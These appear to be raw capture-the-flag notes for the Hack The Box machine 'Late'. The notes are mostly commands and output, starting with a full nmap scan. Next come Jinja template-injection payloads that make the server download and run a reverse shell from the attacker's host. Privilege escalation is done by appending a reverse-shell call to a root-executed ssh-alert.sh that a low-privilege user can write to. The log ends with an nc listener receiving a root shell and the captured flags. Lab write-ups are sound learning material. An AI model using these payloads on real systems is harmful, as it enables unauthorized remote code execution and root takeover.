nmap -T4 -A -p- -Pn -v 10.10.11.156
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-31 00:26 UTC
NSE: Loaded 155 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
Initiating NSE at 00:26
Completed NSE at 00:26, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 00:26
Completed Parallel DNS resolution of 1 host. at 00:26, 0.00s elapsed
Initiating SYN Stealth Scan at 00:26
Scanning 10.10.11.156 [65535 ports]
Discovered open port 80/tcp on 10.10.11.156
Discovered open port 22/tcp on 10.10.11.156
SYN Stealth Scan Timing: About 21.72% done; ETC: 00:28 (0:01:52 remaining)
SYN Stealth Scan Timing: About 47.36% done; ETC: 00:28 (0:01:08 remaining)
SYN Stealth Scan Timing: About 67.89% done; ETC: 00:28 (0:00:43 remaining)
Completed SYN Stealth Scan at 00:28, 137.46s elapsed (65535 total ports)
Initiating Service scan at 00:28
Scanning 2 services on 10.10.11.156
Completed Service scan at 00:28, 6.30s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against 10.10.11.156
Retrying OS detection (try #2) against 10.10.11.156
Retrying OS detection (try #3) against 10.10.11.156
Retrying OS detection (try #4) against 10.10.11.156
Retrying OS detection (try #5) against 10.10.11.156
Initiating Traceroute at 00:28
Completed Traceroute at 00:28, 0.14s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 00:28
Completed Parallel DNS resolution of 2 hosts. at 00:28, 0.00s elapsed
NSE: Script scanning 10.10.11.156.
Initiating NSE at 00:28
Completed NSE at 00:28, 4.14s elapsed
Initiating NSE at 00:28
Completed NSE at 00:28, 0.58s elapsed
Initiating NSE at 00:28
Completed NSE at 00:28, 0.01s elapsed
Nmap scan report for 10.10.11.156
Host is up (0.14s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 02:5e:29:0e:a3:af:4e:72:9d:a4:fe:0d:cb:5d:83:07 (RSA)
|   256 41:e1:fe:03:a5:c7:97:c4:d5:16:77:f3:41:0c:e9:fb (ECDSA)
|_  256 28:39:46:98:17:1e:46:1a:1e:a1:ab:3b:9a:57:70:48 (ED25519)
80/tcp open  http    nginx 1.14.0 (Ubuntu)
|_http-favicon: Unknown favicon MD5: 1575FDF0E164C3DB0739CF05D9315BDF
|_http-title: Late - Best online image tools
| http-methods:
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.14.0 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=5/31%OT=22%CT=1%CU=41072%PV=Y%DS=2%DC=T%G=Y%TM=6295614
OS:3%P=x86_64-unknown-linux-gnu)SEQ(SP=100%GCD=1%ISR=107%TI=Z%CI=Z%II=I%TS=
OS:A)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M5
OS:08ST11NW7%O6=M508ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE8
OS:8)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S
OS:+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=
OS:)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%
OS:A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%
OS:DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=
OS:40%CD=S)

Uptime guess: 1.063 days (since Sun May 29 22:58:45 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=256 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

http://images.late.htb/
Flask
Gimp + Monospace + 36
Or just screenshot may help...

{{ config.__class__.__init__.__globals__["os"].popen("wget http://10.10.14.3:8000/revshell.sh").read() }}
{{ config.__class__.__init__.__globals__["os"].popen("bash /home/svc_acc/app/revshell.sh").read() }}

$ cat user.txt
d01bdb72ac9f9e82f32c6abf972a12f1

PE

lxc failed
KE all failed

svc_acc@late:~/app$ find / -type f -user svc_acc 2>/dev/null | grep -v "/proc/" | grep -v "/sys/"
svc_acc@late:~/app$ cat /usr/local/sbin/ssh-alert.sh
cat /usr/local/sbin/ssh-alert.sh
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi


svc_acc@late:~/app$ cd ..
cd ..
svc_acc@late:~$ ls
ls
46978.sh    47164.zip                                 app       pspy64
46978.sh.1  47165.sh                                  cron      user.txt
47164.sh    alpine-v3.15-x86_64-20220427_1228.tar.gz  __MACOSX
svc_acc@late:~$ echo "" >> /usr/local/sbin/ssh-alert.sh
echo "" >> /usr/local/sbin/ssh-alert.sh
svc_acc@late:~$ echo "bash /tmp/revshell2.sh" >> /usr/local/sbin/ssh-alert.sh
echo "bash /tmp/revshell2.sh" >> /usr/local/sbin/ssh-alert.sh
svc_acc@late:~$ cat /usr/local/sbin/ssh-alert.sh
cat /usr/local/sbin/ssh-alert.sh
#!/bin/bash

RECIPIENT="root@late.htb"
SUBJECT="Email from Server Login: SSH Alert"

BODY="
A SSH login was detected.

        User:        $PAM_USER
        User IP Host: $PAM_RHOST
        Service:     $PAM_SERVICE
        TTY:         $PAM_TTY
        Date:        `date`
        Server:      `uname -a`
"

if [ ${PAM_TYPE} = "open_session" ]; then
        echo "Subject:${SUBJECT} ${BODY}" | /usr/sbin/sendmail ${RECIPIENT}
fi


bash /tmp/revshell2.sh
svc_acc@late:~$ ssh -i .ssh/id_rsa svc_acc@127.0.0.1
ssh -i .ssh/id_rsa svc_acc@127.0.0.1

The ssh-alert.sh is executed by root when a user (not only root!) login, but can be edited by svc_acc.

root@ubuntu-s-1vcpu-1gb-sfo2-01:~/htb/htb/Late_10.10.11.156# nc -nlvp 2234
Listening on [0.0.0.0] (family 0, port 2234)
Connection from 10.10.11.156 41204 received!
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.txt
9254184243c53458b506e582a7ade45c
#

